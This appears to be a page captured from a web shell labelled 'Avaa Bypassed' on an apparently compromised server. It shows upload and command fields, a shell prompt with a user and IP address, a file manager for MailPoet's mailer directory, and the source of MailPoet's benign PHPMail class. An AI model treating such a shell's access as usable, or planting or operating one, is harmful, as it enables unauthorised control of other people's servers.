[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.116.81.161: ~ $
<?php declare(strict_types = 1);

namespace MailPoet\Mailer\Methods;

if (!defined('ABSPATH')) exit;


use PHPMailer\PHPMailer\PHPMailer;

class PHPMail extends PHPMailerMethod {
  public function buildMailer(): PHPMailer {
    $mailer = new PHPMailer(true);
    // send using PHP's mail() function
    $mailer->isMail();
    return $mailer;
  }
}

Filemanager

Name Type Size Permission Actions
Common Folder 0755
ErrorMappers Folder 0755
AmazonSES.php File 7.25 KB 0644
MailPoet.php File 6.1 KB 0644
MailerMethod.php File 224 B 0644
PHPMail.php File 348 B 0644
PHPMailerMethod.php File 4.98 KB 0644
SMTP.php File 3.9 KB 0644
SendGrid.php File 3.46 KB 0644
index.php File 6 B 0644